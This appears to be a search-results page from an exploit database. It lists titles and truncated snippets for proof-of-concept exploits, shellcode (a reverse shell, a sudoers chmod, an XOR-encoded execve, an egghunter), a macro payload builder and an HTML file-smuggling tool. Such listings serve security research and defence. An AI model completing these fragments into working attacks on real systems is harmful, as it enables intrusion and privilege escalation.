7258 matches found
Cisco IOS - Remote Code Execution
!/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco Systems on June 29th 2017 - Descriptio...
Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)
Linux/x86 - Reverse TCP 127.1.1.1:8888/TCP Shell /bin/sh + Null-Free Shellcode 67/69 bytes. Shellcode exploit for Linux_x86 platform / Title: Linux/x86 - Reverse TCP Shell /bin/sh 127.1.1.1:8888/TCP Null-Free Shellcode 69 bytes Description: Smallest /bin/sh Reverse TCP Shellcode Null Free, No...
Debugging Complex Malware that Executes Code on the Heap
Introduction In this blog, I will share a simple debugging tactic for creating “save points” during iterative remote debugging of complex multi-stage samples that execute code in heap memory at non-deterministic addresses. I’ll share two examples: one contrived, and the other a complex, modular...
Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)
Linux/x86 - chmod 777 /etc/sudoers Shellcode 36 bytes. Shellcode exploit for Linux_x86 platform / Description ; Title : chmod 777 /etc/sudoers - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : chmod /etc/sudoers permissio...
PT-2018-19371
Name of the Vulnerable Software and Affected Versions SC version 7.16 Description A stack-based buffer overflow allows local attackers to execute arbitrary code by providing oversized input that exceeds buffer boundaries. By crafting malicious input strings larger than 1052 bytes, an attacker can...
Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)
Linux/x64 - Custom Encoded XOR + Polymorphic + execve/bin/sh Shellcode Generator. Shellcode exploit for Generator platform !/usr/bin/python from random import randint encoded = "" encoded2 = "" badchars = 0x00 shellcode = "\x90" +...
Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode
Linux/x64 - Custom Encoded XOR + execve/bin/sh Shellcode. Shellcode exploit for Linux_x86-64 platform global start section .text start: jmp findaddress ; jmp short by default decoder: ; Get the address of the string pop rdi push rdi pop rbx ; get the first byte and bruteforce till you get the toke...
MS-Word Payload Delivery: Macro Creator
Invoke-MacroCreator is a PowerShell cmdlet that allows for the creation of an MS-Word document embedding a VBA macro with various payload delivery and execution capabilities. Description: Basically the script supports three types of payload that you MUST specify using the -t argument: 1. shellcode...
LabF nfsAxe FTP Client 3.7 - Remote Buffer Overflow (DEP Bypass)
!/usr/bin/env python Exploit Title : LabF nfsAxe 3.7 FTP Client DEP Bypass Date : 12/8/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html Software link : http://www.labf.com/download/nfsaxe.exe Version : 3.7 Tested on : Windows 7 x86 Description : Upon...
LabF nfsAxe FTP Client 3.7 - Remote Buffer Overflow (DEP Bypass)
LabF nfsAxe FTP Client 3.7 - Remote Buffer Overflow DEP Bypass !/usr/bin/env python Exploit Title : LabF nfsAxe 3.7 FTP Client DEP Bypass Date : 12/8/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html Software link : http://www.labf.com/download/nfsaxe.exe...
LabF nfsAxe FTP Client 3.7 Buffer Overflow
!/usr/bin/env python Exploit Title : LabF nfsAxe 3.7 FTP Client DEP Bypass Date : 12/8/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html Software link : http://www.labf.com/download/nfsaxe.exe Version : 3.7 Tested on : Windows 7 x86 Description : Upon...
SocuSoft Co. Photo 2 Video Converter 8.0.0 Code Execution / DoS Exploit
SocuSoft Co. Photo 2 Video Converter Free and Pro variants version 8.0.0 suffer from a buffer overflow in the pdmlog.dll library.
Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow
Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow Exploit Title: Socusoft Photo 2 Video Converter v8.0.0 Local Buffer Overflow Free and Professional variants Date: 01/12/2017 Exploit Author: Jason Magic ret2eax Vendor Homepage: www.socusoft.com Version: 8.0.0 Tested on: Windows Serve...
Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow
Exploit Title: Socusoft Photo 2 Video Converter v8.0.0 Local Buffer Overflow Free and Professional variants Date: 01/12/2017 Exploit Author: Jason Magic ret2eax Vendor Homepage: www.socusoft.com Version: 8.0.0 Tested on: Windows Server 2008 R2 Socusoft's Photo 2 Video Converter v8.0.0 Free and...
Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)
!/usr/bin/python import struct Exploit Author: Miguel Mendez Z Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode Date: 29-11-2017 Software: Dup Scout Enterprise Version: v10.0.18 Vendor Homepage: http://www.dupscout.com Software Link:...
Dup Scout Enterprise 10.0.18 - Input Directory Local Buffer Overflow (SEH)
Dup Scout Enterprise 10.0.18 - Input Directory Local Buffer Overflow SEH !/usr/bin/python import struct Exploit Author: Miguel Mendez Z Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode Date: 29-11-2017 Software: Dup Scout Enterprise Version:...
Microsoft Windows 10 Creators Update version 1703 - Kernel Local Privilege Escalation Exploit
Microsoft Windows 10 Creators Update version 1703 x86 - 'WARBIRD' 'NtQuerySystemInformation' Kernel Local Privilege Escalation / EDB Note Source https://gist.github.com/xpn/736daa4d1ff7b9869f4b3d1e9a34d315/ff2e2465d4a07588d0148dc87e77b17b41ef9d1d Source...
ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)
!/usr/bin/python Tested on: Windows 10 Professional x86 Exploit for previous version: https://www.exploit-db.com/exploits/42455/ Seems they haven't patched the vulnerability at all :D msfvenom -p windows/exec CMD="calc.exe" -e x86/unicodemixed BufferRegister=EAX -f python shellcode = "" shellcode...
EmbedInHTML - Embed and hide any file in an HTML file
This tool takes a file (any type of file), encrypts it, and embeds it into an HTML file as a resource, along with an automatic download routine simulating a user clicking on the embedded resource. Then, when the user browses the HTML file, the embedded file is decrypted on the fly, save...
Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)
Linux/x64 - Egghunter 0xbeefbeef Shellcode 34 bytes. Shellcode exploit for Linux_x86-64 platform global start section .text start: xor rsi,rsi push rsi ; starts the search at position 0 pop rdi nextpage: or di,0xfff inc rdi next4bytes: push 21 pop rax syscall cmp al,0xf2 jz nextpage mov...